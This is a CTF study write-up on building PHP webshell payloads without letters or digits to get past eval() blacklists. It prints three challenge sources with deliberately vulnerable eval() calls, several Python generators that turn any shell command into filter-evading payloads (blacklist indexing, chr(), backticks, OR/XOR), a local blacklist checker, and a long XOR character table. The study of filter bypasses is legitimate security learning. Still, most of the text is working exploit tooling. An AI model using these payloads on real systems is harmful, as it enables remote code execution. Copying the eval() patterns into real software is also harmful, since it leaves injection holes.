Alphanumeric-free webshells

I recently picked up a few command-execution bypass tricks, but in yesterday's 安恒 August contest there was a modified command-execution challenge, and even after reading y1ng's script I didn't fully get it, so today I am studying this topic on its own. The original write-up on alphanumeric-free webshells is P神's 2017 article, so once again this is standing on the shoulders of giants to go one level deeper.

The filter-style challenges seen today roughly fall into the following kinds:

1. Letters and some symbols filtered

<?php
error_reporting(0);
show_source(__FILE__);
$hint=file_get_contents('php://filter/read=convert.base64-encode/resource=hhh.php');
$code=$_REQUEST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','\~','\^');
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('nonono');
    }
}
eval("echo($code);");
?>

2. Letters and digits filtered

<?php
// Variant A (P神's original challenge): any letter or digit is rejected, anything else is eval'd.
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
  eval($_GET['shell']);
}

// Variant B (a second challenge on the same theme): at most 35 bytes, and _ and $ are
// banned as well, so the $_ / $_POST based tricks below do not fit it.
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

3. Letters, digits and most symbols filtered

<?php
error_reporting(0);
show_source(__FILE__);
$code=$_POST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $code)) {
        die('you are not smart');
    }
}
eval("echo($code)");
?>

The core of all of these is to build letters and digits out of the characters and symbols that are not filtered, and get a shell from there.

Letters and some symbols filtered

The challenge source is given above; it is from ctf.show 36D杯 WEB_你取吧.

The source logic is a plain blacklist: the bitwise NOT (~) and XOR (^) operators and every letter are on it.

Using the blacklist itself (constraints: `, $, [, ], _ and digits are not filtered)

Use the blacklist array directly: it is stored in $_, so $_[n] yields the n-th blacklisted letter, PHP interpolates $_[n] inside a backtick string, and backticks in PHP run the string through the shell (shell_exec), which is enough for RCE.

def solve1():
    # Blacklist in the challenge's order: $_[n] in the payload resolves to this list's n-th entry
    _ = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'l', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '~', '^']
    operation = input("Operation:")
    payload = ""
    for i in range(len(operation)):
        if operation[i] in _:
            # replace each blacklisted letter with its index into $_ (note 'l' sits at 13, after 'm' and 'n')
            num = ''.join(_).index(operation[i])
            payload += f"$_[{num}]"
        else:
            payload += operation[i]
    # backticks in PHP are shell_exec(), and $_[n] is interpolated inside them
    payload = '`'+payload+'`'
    print('payload:'+ payload)

Constructing a system() call from the blacklist and chr()

This idea comes from 阿狸's method 2.

The main idea: build the string chr from $_[2].$_[7].$_[17] ('c'.'h'.'r') and store it in a variable, use it to spell system and the command to run, then call them; it relies on digits not being banned.

def solve2():
    # Build chr() from the blacklist array, spell 'system' and the command with it, then call it
    _ = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'l', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '~', '^']
    _0 = '($_0=$_[2].$_[7].$_[17])'  # $_0 = 'c'.'h'.'r' = chr
    _1 = '($_1=$_0(115).$_0(121).$_0(115).$_0(116).$_0(101).$_0(109))'  # $_1 = system
    operation = input("Operation:")
    _2 = '($_2='
    for i in operation:
        temp = '$_0(' + str(ord(i)) + ').'
        _2 += temp
    _2 = _2[:-1] + ')'  # drop the trailing '.'
    # one long concatenation inside echo(...): the assignments and the call all get evaluated
    payload = _0 + '.' + _1 + '.' + _2 + '.($_1($_2))'
    print('payload:' + payload)
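The two generators above target the same challenge and the same blacklist, so here is one added example (my code, not part of the original post or of the challenge) that produces both payloads for an arbitrary command and re-implements the challenge's preg_match loop locally, so a payload can be checked against the blacklist before it is sent. The command 'cat /flag' is a placeholder.

```python
import re
from urllib.parse import quote

# The blacklist exactly as the challenge declares it (order matters: $_[n] indexes it).
BLACKLIST = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'l',
             'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', r'\~', r'\^']
# Letters are looked up by position; the two escaped entries never appear in a payload.
LETTER_INDEX = {ch: i for i, ch in enumerate(BLACKLIST) if len(ch) == 1}


def passes_blacklist(code: str) -> bool:
    """Mirror of the PHP loop: preg_match('/' . $blacklisted . '/im', $code) for each entry.
    Each entry is used as a regex, so '\\~' matches a literal ~ and '\\^' a literal ^;
    the i flag means uppercase letters are rejected as well."""
    return not any(re.search(entry, code, re.IGNORECASE | re.MULTILINE) for entry in BLACKLIST)


def backtick_payload(cmd: str) -> str:
    """`$_[13]$_[18]` style: every lowercase letter becomes an index into $_, and the backticks
    run the interpolated string through the shell. Other bytes pass through unchanged, so an
    uppercase letter would still trip the filter (the chr() variant below handles any byte)."""
    body = ''.join(f'$_[{LETTER_INDEX[c]}]' if c in LETTER_INDEX else c for c in cmd)
    return '`' + body + '`'


def chr_system_payload(cmd: str) -> str:
    """$_0 = 'c'.'h'.'r' (indexes 2, 7, 17 of $_), then spell 'system' and the command as
    $_0(<ascii>) and call system($cmd). Only digits are emitted for the command bytes."""
    chr_fn = '($_0=$_[2].$_[7].$_[17])'
    system_fn = '($_1=' + '.'.join(f'$_0({ord(c)})' for c in 'system') + ')'
    arg = '($_2=' + '.'.join(f'$_0({ord(c)})' for c in cmd) + ')'
    return chr_fn + '.' + system_fn + '.' + arg + '.($_1($_2))'


def check(cmd: str) -> dict:
    """Both payloads for cmd, each with the local blacklist verdict and the URL-encoded form
    for the code= parameter (everything encoded, so &, ; and spaces survive the query string)."""
    out = {}
    for name, p in (('backtick', backtick_payload(cmd)), ('chr', chr_system_payload(cmd))):
        out[name] = {'payload': p, 'passes': passes_blacklist(p),
                     'url_param': 'code=' + quote(p, safe='')}
    return out


if __name__ == '__main__':
    for name, r in check('cat /flag').items():
        print(name, 'passes' if r['passes'] else 'BLOCKED', r['payload'])
```

The local check is the step worth keeping: the challenge applies every entry as a regex with the i flag, so a payload that looks symbol-only but carries a single uppercase letter (for example in a file name) is rejected, and it is cheaper to learn that from passes_blacklist() than from a 'nonono' response.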

Letters and digits filtered

Bitwise OR, XOR and NOT

This method only works when most special characters are left unfiltered; the idea is to obtain the target character from a bitwise operation between two other characters.

Within ASCII, bitwise AND of two non-alphanumeric characters cannot produce a or A, so AND is generally not used.

OR script

# OR script
from urllib.parse import quote

def solve3(param='shell'):
    l = 'abcdefghijklmnopqrstuvwxyz'
    n = '0123456789'
    operation = input("Operation:")
    front = ""
    after = ""
    for i in operation:
        if i.isalpha():
            # chr(1..26) | 0x60 gives a-z and | 0x40 gives A-Z; neither operand is alphanumeric.
            # Keep the input's case: shell commands are case-sensitive, PHP function names are not.
            front += chr(l.index(i.lower()) + 1)
            after += chr(96) if i.islower() else chr(64)
        elif i.isdigit():
            # chr(0x20..0x29) | 0x10 gives 0-9
            front += chr(n.index(i) + 32)
            after += chr(16)
        else:
            # symbols are copied into both halves unchanged: x | x == x
            front += i
            after += i
    # "%13%19%13%14%05%0D" | "%40%40%40%40%40%40" == "SYSTEM"; PHP function names are case-insensitive.
    # The %XX bytes are decoded by PHP when it parses the query string, so send them as-is, not double-encoded.
    payload = "($_=(\"%13%19%13%14%05%0D\"|\"%40%40%40%40%40%40\")).($__ = \"" + quote(
        front) + "\"" + '|' + "\"" + quote(after) + "\").($_($__));"
    print('payload:' + param + '=' + payload)

XOR script

# XOR script: identical to the OR script except for the operator used to spell SYSTEM
from urllib.parse import quote

def solve4(param='shell'):
    l = 'abcdefghijklmnopqrstuvwxyz'
    n = '0123456789'
    operation = input("Operation:")
    front = ""
    after = ""
    for i in operation:
        if i.isalpha():
            # chr(1..26) with 0x60 gives a-z, with 0x40 gives A-Z (same result for ^ and |,
            # because the low five bits and 0x60/0x40 never overlap)
            front += chr(l.index(i.lower()) + 1)
            after += chr(96) if i.islower() else chr(64)
        elif i.isdigit():
            front += chr(n.index(i) + 32)
            after += chr(16)
        else:
            front += i
            after += i
    # The command half deliberately stays on |: symbols copied into both halves survive (x | x == x),
    # whereas x ^ x would turn every space, - or / into a NUL byte.
    payload = "($_=(\"%13%19%13%14%05%0D\"^\"%40%40%40%40%40%40\")).($__ = \"" + quote(
        front) + "\"" + '|' + "\"" + quote(after) + "\").($_($__));"
    print('payload:' + param + '=' + payload)
    print('- ' * 60)

The OR and XOR scripts are the same apart from the operator, but XOR has more usable combinations, so every XOR pair that yields a letter or digit is listed below.

chr(1) ^ chr(64) = A
chr(1) ^ chr(91) = Z
chr(1) ^ chr(96) = a
chr(1) ^ chr(123) = z
chr(2) ^ chr(58) = 8
chr(2) ^ chr(59) = 9
chr(2) ^ chr(64) = B
chr(2) ^ chr(91) = Y
chr(2) ^ chr(96) = b
chr(2) ^ chr(123) = y
chr(3) ^ chr(58) = 9
chr(3) ^ chr(59) = 8
chr(3) ^ chr(64) = C
chr(3) ^ chr(91) = X
chr(3) ^ chr(96) = c
chr(3) ^ chr(123) = x
chr(4) ^ chr(60) = 8
chr(4) ^ chr(61) = 9
chr(4) ^ chr(64) = D
chr(4) ^ chr(92) = X
chr(4) ^ chr(93) = Y
chr(4) ^ chr(94) = Z
chr(4) ^ chr(96) = d
chr(4) ^ chr(124) = x
chr(4) ^ chr(125) = y
chr(4) ^ chr(126) = z
chr(5) ^ chr(60) = 9
chr(5) ^ chr(61) = 8
chr(5) ^ chr(64) = E
chr(5) ^ chr(92) = Y
chr(5) ^ chr(93) = X
chr(5) ^ chr(95) = Z
chr(5) ^ chr(96) = e
chr(5) ^ chr(124) = y
chr(5) ^ chr(125) = x
chr(5) ^ chr(127) = z
chr(6) ^ chr(62) = 8
chr(6) ^ chr(63) = 9
chr(6) ^ chr(64) = F
chr(6) ^ chr(92) = Z
chr(6) ^ chr(94) = X
chr(6) ^ chr(95) = Y
chr(6) ^ chr(96) = f
chr(6) ^ chr(124) = z
chr(6) ^ chr(126) = x
chr(6) ^ chr(127) = y
chr(7) ^ chr(62) = 9
chr(7) ^ chr(63) = 8
chr(7) ^ chr(64) = G
chr(7) ^ chr(93) = Z
chr(7) ^ chr(94) = Y
chr(7) ^ chr(95) = X
chr(7) ^ chr(96) = g
chr(7) ^ chr(125) = z
chr(7) ^ chr(126) = y
chr(7) ^ chr(127) = x
chr(8) ^ chr(58) = 2
chr(8) ^ chr(59) = 3
chr(8) ^ chr(60) = 4
chr(8) ^ chr(61) = 5
chr(8) ^ chr(62) = 6
chr(8) ^ chr(63) = 7
chr(8) ^ chr(64) = H
chr(8) ^ chr(91) = S
chr(8) ^ chr(92) = T
chr(8) ^ chr(93) = U
chr(8) ^ chr(94) = V
chr(8) ^ chr(95) = W
chr(8) ^ chr(96) = h
chr(8) ^ chr(123) = s
chr(8) ^ chr(124) = t
chr(8) ^ chr(125) = u
chr(8) ^ chr(126) = v
chr(8) ^ chr(127) = w
chr(9) ^ chr(58) = 3
chr(9) ^ chr(59) = 2
chr(9) ^ chr(60) = 5
chr(9) ^ chr(61) = 4
chr(9) ^ chr(62) = 7
chr(9) ^ chr(63) = 6
chr(9) ^ chr(64) = I
chr(9) ^ chr(91) = R
chr(9) ^ chr(92) = U
chr(9) ^ chr(93) = T
chr(9) ^ chr(94) = W
chr(9) ^ chr(95) = V
chr(9) ^ chr(96) = i
chr(9) ^ chr(123) = r
chr(9) ^ chr(124) = u
chr(9) ^ chr(125) = t
chr(9) ^ chr(126) = w
chr(9) ^ chr(127) = v
chr(10) ^ chr(58) = 0
chr(10) ^ chr(59) = 1
chr(10) ^ chr(60) = 6
chr(10) ^ chr(61) = 7
chr(10) ^ chr(62) = 4
chr(10) ^ chr(63) = 5
chr(10) ^ chr(64) = J
chr(10) ^ chr(91) = Q
chr(10) ^ chr(92) = V
chr(10) ^ chr(93) = W
chr(10) ^ chr(94) = T
chr(10) ^ chr(95) = U
chr(10) ^ chr(96) = j
chr(10) ^ chr(123) = q
chr(10) ^ chr(124) = v
chr(10) ^ chr(125) = w
chr(10) ^ chr(126) = t
chr(10) ^ chr(127) = u
chr(11) ^ chr(58) = 1
chr(11) ^ chr(59) = 0
chr(11) ^ chr(60) = 7
chr(11) ^ chr(61) = 6
chr(11) ^ chr(62) = 5
chr(11) ^ chr(63) = 4
chr(11) ^ chr(64) = K
chr(11) ^ chr(91) = P
chr(11) ^ chr(92) = W
chr(11) ^ chr(93) = V
chr(11) ^ chr(94) = U
chr(11) ^ chr(95) = T
chr(11) ^ chr(96) = k
chr(11) ^ chr(123) = p
chr(11) ^ chr(124) = w
chr(11) ^ chr(125) = v
chr(11) ^ chr(126) = u
chr(11) ^ chr(127) = t
chr(12) ^ chr(58) = 6
chr(12) ^ chr(59) = 7
chr(12) ^ chr(60) = 0
chr(12) ^ chr(61) = 1
chr(12) ^ chr(62) = 2
chr(12) ^ chr(63) = 3
chr(12) ^ chr(64) = L
chr(12) ^ chr(91) = W
chr(12) ^ chr(92) = P
chr(12) ^ chr(93) = Q
chr(12) ^ chr(94) = R
chr(12) ^ chr(95) = S
chr(12) ^ chr(96) = l
chr(12) ^ chr(123) = w
chr(12) ^ chr(124) = p
chr(12) ^ chr(125) = q
chr(12) ^ chr(126) = r
chr(12) ^ chr(127) = s
chr(13) ^ chr(58) = 7
chr(13) ^ chr(59) = 6
chr(13) ^ chr(60) = 1
chr(13) ^ chr(61) = 0
chr(13) ^ chr(62) = 3
chr(13) ^ chr(63) = 2
chr(13) ^ chr(64) = M
chr(13) ^ chr(91) = V
chr(13) ^ chr(92) = Q
chr(13) ^ chr(93) = P
chr(13) ^ chr(94) = S
chr(13) ^ chr(95) = R
chr(13) ^ chr(96) = m
chr(13) ^ chr(123) = v
chr(13) ^ chr(124) = q
chr(13) ^ chr(125) = p
chr(13) ^ chr(126) = s
chr(13) ^ chr(127) = r
chr(14) ^ chr(58) = 4
chr(14) ^ chr(59) = 5
chr(14) ^ chr(60) = 2
chr(14) ^ chr(61) = 3
chr(14) ^ chr(62) = 0
chr(14) ^ chr(63) = 1
chr(14) ^ chr(64) = N
chr(14) ^ chr(91) = U
chr(14) ^ chr(92) = R
chr(14) ^ chr(93) = S
chr(14) ^ chr(94) = P
chr(14) ^ chr(95) = Q
chr(14) ^ chr(96) = n
chr(14) ^ chr(123) = u
chr(14) ^ chr(124) = r
chr(14) ^ chr(125) = s
chr(14) ^ chr(126) = p
chr(14) ^ chr(127) = q
chr(15) ^ chr(58) = 5
chr(15) ^ chr(59) = 4
chr(15) ^ chr(60) = 3
chr(15) ^ chr(61) = 2
chr(15) ^ chr(62) = 1
chr(15) ^ chr(63) = 0
chr(15) ^ chr(64) = O
chr(15) ^ chr(91) = T
chr(15) ^ chr(92) = S
chr(15) ^ chr(93) = R
chr(15) ^ chr(94) = Q
chr(15) ^ chr(95) = P
chr(15) ^ chr(96) = o
chr(15) ^ chr(123) = t
chr(15) ^ chr(124) = s
chr(15) ^ chr(125) = r
chr(15) ^ chr(126) = q
chr(15) ^ chr(127) = p
chr(16) ^ chr(32) = 0
chr(16) ^ chr(33) = 1
chr(16) ^ chr(34) = 2
chr(16) ^ chr(35) = 3
chr(16) ^ chr(36) = 4
chr(16) ^ chr(37) = 5
chr(16) ^ chr(38) = 6
chr(16) ^ chr(39) = 7
chr(16) ^ chr(40) = 8
chr(16) ^ chr(41) = 9
chr(16) ^ chr(64) = P
chr(16) ^ chr(91) = K
chr(16) ^ chr(92) = L
chr(16) ^ chr(93) = M
chr(16) ^ chr(94) = N
chr(16) ^ chr(95) = O
chr(16) ^ chr(96) = p
chr(16) ^ chr(123) = k
chr(16) ^ chr(124) = l
chr(16) ^ chr(125) = m
chr(16) ^ chr(126) = n
chr(16) ^ chr(127) = o
chr(17) ^ chr(32) = 1
chr(17) ^ chr(33) = 0
chr(17) ^ chr(34) = 3
chr(17) ^ chr(35) = 2
chr(17) ^ chr(36) = 5
chr(17) ^ chr(37) = 4
chr(17) ^ chr(38) = 7
chr(17) ^ chr(39) = 6
chr(17) ^ chr(40) = 9
chr(17) ^ chr(41) = 8
chr(17) ^ chr(64) = Q
chr(17) ^ chr(91) = J
chr(17) ^ chr(92) = M
chr(17) ^ chr(93) = L
chr(17) ^ chr(94) = O
chr(17) ^ chr(95) = N
chr(17) ^ chr(96) = q
chr(17) ^ chr(123) = j
chr(17) ^ chr(124) = m
chr(17) ^ chr(125) = l
chr(17) ^ chr(126) = o
chr(17) ^ chr(127) = n
chr(18) ^ chr(32) = 2
chr(18) ^ chr(33) = 3
chr(18) ^ chr(34) = 0
chr(18) ^ chr(35) = 1
chr(18) ^ chr(36) = 6
chr(18) ^ chr(37) = 7
chr(18) ^ chr(38) = 4
chr(18) ^ chr(39) = 5
chr(18) ^ chr(42) = 8
chr(18) ^ chr(43) = 9
chr(18) ^ chr(64) = R
chr(18) ^ chr(91) = I
chr(18) ^ chr(92) = N
chr(18) ^ chr(93) = O
chr(18) ^ chr(94) = L
chr(18) ^ chr(95) = M
chr(18) ^ chr(96) = r
chr(18) ^ chr(123) = i
chr(18) ^ chr(124) = n
chr(18) ^ chr(125) = o
chr(18) ^ chr(126) = l
chr(18) ^ chr(127) = m
chr(19) ^ chr(32) = 3
chr(19) ^ chr(33) = 2
chr(19) ^ chr(34) = 1
chr(19) ^ chr(35) = 0
chr(19) ^ chr(36) = 7
chr(19) ^ chr(37) = 6
chr(19) ^ chr(38) = 5
chr(19) ^ chr(39) = 4
chr(19) ^ chr(42) = 9
chr(19) ^ chr(43) = 8
chr(19) ^ chr(64) = S
chr(19) ^ chr(91) = H
chr(19) ^ chr(92) = O
chr(19) ^ chr(93) = N
chr(19) ^ chr(94) = M
chr(19) ^ chr(95) = L
chr(19) ^ chr(96) = s
chr(19) ^ chr(123) = h
chr(19) ^ chr(124) = o
chr(19) ^ chr(125) = n
chr(19) ^ chr(126) = m
chr(19) ^ chr(127) = l
chr(20) ^ chr(32) = 4
chr(20) ^ chr(33) = 5
chr(20) ^ chr(34) = 6
chr(20) ^ chr(35) = 7
chr(20) ^ chr(36) = 0
chr(20) ^ chr(37) = 1
chr(20) ^ chr(38) = 2
chr(20) ^ chr(39) = 3
chr(20) ^ chr(44) = 8
chr(20) ^ chr(45) = 9
chr(20) ^ chr(64) = T
chr(20) ^ chr(91) = O
chr(20) ^ chr(92) = H
chr(20) ^ chr(93) = I
chr(20) ^ chr(94) = J
chr(20) ^ chr(95) = K
chr(20) ^ chr(96) = t
chr(20) ^ chr(123) = o
chr(20) ^ chr(124) = h
chr(20) ^ chr(125) = i
chr(20) ^ chr(126) = j
chr(20) ^ chr(127) = k
chr(21) ^ chr(32) = 5
chr(21) ^ chr(33) = 4
chr(21) ^ chr(34) = 7
chr(21) ^ chr(35) = 6
chr(21) ^ chr(36) = 1
chr(21) ^ chr(37) = 0
chr(21) ^ chr(38) = 3
chr(21) ^ chr(39) = 2
chr(21) ^ chr(44) = 9
chr(21) ^ chr(45) = 8
chr(21) ^ chr(64) = U
chr(21) ^ chr(91) = N
chr(21) ^ chr(92) = I
chr(21) ^ chr(93) = H
chr(21) ^ chr(94) = K
chr(21) ^ chr(95) = J
chr(21) ^ chr(96) = u
chr(21) ^ chr(123) = n
chr(21) ^ chr(124) = i
chr(21) ^ chr(125) = h
chr(21) ^ chr(126) = k
chr(21) ^ chr(127) = j
chr(22) ^ chr(32) = 6
chr(22) ^ chr(33) = 7
chr(22) ^ chr(34) = 4
chr(22) ^ chr(35) = 5
chr(22) ^ chr(36) = 2
chr(22) ^ chr(37) = 3
chr(22) ^ chr(38) = 0
chr(22) ^ chr(39) = 1
chr(22) ^ chr(46) = 8
chr(22) ^ chr(47) = 9
chr(22) ^ chr(64) = V
chr(22) ^ chr(91) = M
chr(22) ^ chr(92) = J
chr(22) ^ chr(93) = K
chr(22) ^ chr(94) = H
chr(22) ^ chr(95) = I
chr(22) ^ chr(96) = v
chr(22) ^ chr(123) = m
chr(22) ^ chr(124) = j
chr(22) ^ chr(125) = k
chr(22) ^ chr(126) = h
chr(22) ^ chr(127) = i
chr(23) ^ chr(32) = 7
chr(23) ^ chr(33) = 6
chr(23) ^ chr(34) = 5
chr(23) ^ chr(35) = 4
chr(23) ^ chr(36) = 3
chr(23) ^ chr(37) = 2
chr(23) ^ chr(38) = 1
chr(23) ^ chr(39) = 0
chr(23) ^ chr(46) = 9
chr(23) ^ chr(47) = 8
chr(23) ^ chr(64) = W
chr(23) ^ chr(91) = L
chr(23) ^ chr(92) = K
chr(23) ^ chr(93) = J
chr(23) ^ chr(94) = I
chr(23) ^ chr(95) = H
chr(23) ^ chr(96) = w
chr(23) ^ chr(123) = l
chr(23) ^ chr(124) = k
chr(23) ^ chr(125) = j
chr(23) ^ chr(126) = i
chr(23) ^ chr(127) = h
chr(24) ^ chr(32) = 8
chr(24) ^ chr(33) = 9
chr(24) ^ chr(40) = 0
chr(24) ^ chr(41) = 1
chr(24) ^ chr(42) = 2
chr(24) ^ chr(43) = 3
chr(24) ^ chr(44) = 4
chr(24) ^ chr(45) = 5
chr(24) ^ chr(46) = 6
chr(24) ^ chr(47) = 7
chr(24) ^ chr(64) = X
chr(24) ^ chr(91) = C
chr(24) ^ chr(92) = D
chr(24) ^ chr(93) = E
chr(24) ^ chr(94) = F
chr(24) ^ chr(95) = G
chr(24) ^ chr(96) = x
chr(24) ^ chr(123) = c
chr(24) ^ chr(124) = d
chr(24) ^ chr(125) = e
chr(24) ^ chr(126) = f
chr(24) ^ chr(127) = g
chr(25) ^ chr(32) = 9
chr(25) ^ chr(33) = 8
chr(25) ^ chr(40) = 1
chr(25) ^ chr(41) = 0
chr(25) ^ chr(42) = 3
chr(25) ^ chr(43) = 2
chr(25) ^ chr(44) = 5
chr(25) ^ chr(45) = 4
chr(25) ^ chr(46) = 7
chr(25) ^ chr(47) = 6
chr(25) ^ chr(64) = Y
chr(25) ^ chr(91) = B
chr(25) ^ chr(92) = E
chr(25) ^ chr(93) = D
chr(25) ^ chr(94) = G
chr(25) ^ chr(95) = F
chr(25) ^ chr(96) = y
chr(25) ^ chr(123) = b
chr(25) ^ chr(124) = e
chr(25) ^ chr(125) = d
chr(25) ^ chr(126) = g
chr(25) ^ chr(127) = f
chr(26) ^ chr(34) = 8
chr(26) ^ chr(35) = 9
chr(26) ^ chr(40) = 2
chr(26) ^ chr(41) = 3
chr(26) ^ chr(42) = 0
chr(26) ^ chr(43) = 1
chr(26) ^ chr(44) = 6
chr(26) ^ chr(45) = 7
chr(26) ^ chr(46) = 4
chr(26) ^ chr(47) = 5
chr(26) ^ chr(64) = Z
chr(26) ^ chr(91) = A
chr(26) ^ chr(92) = F
chr(26) ^ chr(93) = G
chr(26) ^ chr(94) = D
chr(26) ^ chr(95) = E
chr(26) ^ chr(96) = z
chr(26) ^ chr(123) = a
chr(26) ^ chr(124) = f
chr(26) ^ chr(125) = g
chr(26) ^ chr(126) = d
chr(26) ^ chr(127) = e
chr(27) ^ chr(34) = 9
chr(27) ^ chr(35) = 8
chr(27) ^ chr(40) = 3
chr(27) ^ chr(41) = 2
chr(27) ^ chr(42) = 1
chr(27) ^ chr(43) = 0
chr(27) ^ chr(44) = 7
chr(27) ^ chr(45) = 6
chr(27) ^ chr(46) = 5
chr(27) ^ chr(47) = 4
chr(27) ^ chr(92) = G
chr(27) ^ chr(93) = F
chr(27) ^ chr(94) = E
chr(27) ^ chr(95) = D
chr(27) ^ chr(124) = g
chr(27) ^ chr(125) = f
chr(27) ^ chr(126) = e
chr(27) ^ chr(127) = d
chr(28) ^ chr(36) = 8
chr(28) ^ chr(37) = 9
chr(28) ^ chr(40) = 4
chr(28) ^ chr(41) = 5
chr(28) ^ chr(42) = 6
chr(28) ^ chr(43) = 7
chr(28) ^ chr(44) = 0
chr(28) ^ chr(45) = 1
chr(28) ^ chr(46) = 2
chr(28) ^ chr(47) = 3
chr(28) ^ chr(91) = G
chr(28) ^ chr(93) = A
chr(28) ^ chr(94) = B
chr(28) ^ chr(95) = C
chr(28) ^ chr(123) = g
chr(28) ^ chr(125) = a
chr(28) ^ chr(126) = b
chr(28) ^ chr(127) = c
chr(29) ^ chr(36) = 9
chr(29) ^ chr(37) = 8
chr(29) ^ chr(40) = 5
chr(29) ^ chr(41) = 4
chr(29) ^ chr(42) = 7
chr(29) ^ chr(43) = 6
chr(29) ^ chr(44) = 1
chr(29) ^ chr(45) = 0
chr(29) ^ chr(46) = 3
chr(29) ^ chr(47) = 2
chr(29) ^ chr(91) = F
chr(29) ^ chr(92) = A
chr(29) ^ chr(94) = C
chr(29) ^ chr(95) = B
chr(29) ^ chr(123) = f
chr(29) ^ chr(124) = a
chr(29) ^ chr(126) = c
chr(29) ^ chr(127) = b
chr(30) ^ chr(38) = 8
chr(30) ^ chr(39) = 9
chr(30) ^ chr(40) = 6
chr(30) ^ chr(41) = 7
chr(30) ^ chr(42) = 4
chr(30) ^ chr(43) = 5
chr(30) ^ chr(44) = 2
chr(30) ^ chr(45) = 3
chr(30) ^ chr(46) = 0
chr(30) ^ chr(47) = 1
chr(30) ^ chr(91) = E
chr(30) ^ chr(92) = B
chr(30) ^ chr(93) = C
chr(30) ^ chr(95) = A
chr(30) ^ chr(123) = e
chr(30) ^ chr(124) = b
chr(30) ^ chr(125) = c
chr(30) ^ chr(127) = a
chr(31) ^ chr(38) = 9
chr(31) ^ chr(39) = 8
chr(31) ^ chr(40) = 7
chr(31) ^ chr(41) = 6
chr(31) ^ chr(42) = 5
chr(31) ^ chr(43) = 4
chr(31) ^ chr(44) = 3
chr(31) ^ chr(45) = 2
chr(31) ^ chr(46) = 1
chr(31) ^ chr(47) = 0
chr(31) ^ chr(91) = D
chr(31) ^ chr(92) = C
chr(31) ^ chr(93) = B
chr(31) ^ chr(94) = A
chr(31) ^ chr(123) = d
chr(31) ^ chr(124) = c
chr(31) ^ chr(125) = b
chr(31) ^ chr(126) = a
chr(33) ^ chr(64) = a
chr(33) ^ chr(91) = z
chr(33) ^ chr(96) = A
chr(33) ^ chr(123) = Z
chr(34) ^ chr(64) = b
chr(34) ^ chr(91) = y
chr(34) ^ chr(96) = B
chr(34) ^ chr(123) = Y
chr(35) ^ chr(64) = c
chr(35) ^ chr(91) = x
chr(35) ^ chr(96) = C
chr(35) ^ chr(123) = X
chr(36) ^ chr(64) = d
chr(36) ^ chr(92) = x
chr(36) ^ chr(93) = y
chr(36) ^ chr(94) = z
chr(36) ^ chr(96) = D
chr(36) ^ chr(124) = X
chr(36) ^ chr(125) = Y
chr(36) ^ chr(126) = Z
chr(37) ^ chr(64) = e
chr(37) ^ chr(92) = y
chr(37) ^ chr(93) = x
chr(37) ^ chr(95) = z
chr(37) ^ chr(96) = E
chr(37) ^ chr(124) = Y
chr(37) ^ chr(125) = X
chr(37) ^ chr(127) = Z
chr(38) ^ chr(64) = f
chr(38) ^ chr(92) = z
chr(38) ^ chr(94) = x
chr(38) ^ chr(95) = y
chr(38) ^ chr(96) = F
chr(38) ^ chr(124) = Z
chr(38) ^ chr(126) = X
chr(38) ^ chr(127) = Y
chr(39) ^ chr(64) = g
chr(39) ^ chr(93) = z
chr(39) ^ chr(94) = y
chr(39) ^ chr(95) = x
chr(39) ^ chr(96) = G
chr(39) ^ chr(125) = Z
chr(39) ^ chr(126) = Y
chr(39) ^ chr(127) = X
chr(40) ^ chr(64) = h
chr(40) ^ chr(91) = s
chr(40) ^ chr(92) = t
chr(40) ^ chr(93) = u
chr(40) ^ chr(94) = v
chr(40) ^ chr(95) = w
chr(40) ^ chr(96) = H
chr(40) ^ chr(123) = S
chr(40) ^ chr(124) = T
chr(40) ^ chr(125) = U
chr(40) ^ chr(126) = V
chr(40) ^ chr(127) = W
chr(41) ^ chr(64) = i
chr(41) ^ chr(91) = r
chr(41) ^ chr(92) = u
chr(41) ^ chr(93) = t
chr(41) ^ chr(94) = w
chr(41) ^ chr(95) = v
chr(41) ^ chr(96) = I
chr(41) ^ chr(123) = R
chr(41) ^ chr(124) = U
chr(41) ^ chr(125) = T
chr(41) ^ chr(126) = W
chr(41) ^ chr(127) = V
chr(42) ^ chr(64) = j
chr(42) ^ chr(91) = q
chr(42) ^ chr(92) = v
chr(42) ^ chr(93) = w
chr(42) ^ chr(94) = t
chr(42) ^ chr(95) = u
chr(42) ^ chr(96) = J
chr(42) ^ chr(123) = Q
chr(42) ^ chr(124) = V
chr(42) ^ chr(125) = W
chr(42) ^ chr(126) = T
chr(42) ^ chr(127) = U
chr(43) ^ chr(64) = k
chr(43) ^ chr(91) = p
chr(43) ^ chr(92) = w
chr(43) ^ chr(93) = v
chr(43) ^ chr(94) = u
chr(43) ^ chr(95) = t
chr(43) ^ chr(96) = K
chr(43) ^ chr(123) = P
chr(43) ^ chr(124) = W
chr(43) ^ chr(125) = V
chr(43) ^ chr(126) = U
chr(43) ^ chr(127) = T
chr(44) ^ chr(64) = l
chr(44) ^ chr(91) = w
chr(44) ^ chr(92) = p
chr(44) ^ chr(93) = q
chr(44) ^ chr(94) = r
chr(44) ^ chr(95) = s
chr(44) ^ chr(96) = L
chr(44) ^ chr(123) = W
chr(44) ^ chr(124) = P
chr(44) ^ chr(125) = Q
chr(44) ^ chr(126) = R
chr(44) ^ chr(127) = S
